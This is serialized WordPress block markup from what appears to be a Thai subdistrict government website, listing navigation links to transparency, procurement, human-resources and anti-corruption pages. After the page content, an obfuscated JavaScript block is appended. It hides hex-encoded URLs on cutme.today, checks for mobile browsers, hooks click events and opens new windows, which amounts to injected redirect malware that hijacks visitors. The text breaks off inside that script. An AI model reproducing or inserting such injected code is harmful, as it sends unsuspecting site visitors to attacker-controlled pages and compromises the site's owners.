data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1059\" data-type=\"page\" data-id=\"1059\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1052\" data-type=\"page\" data-id=\"1052\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| 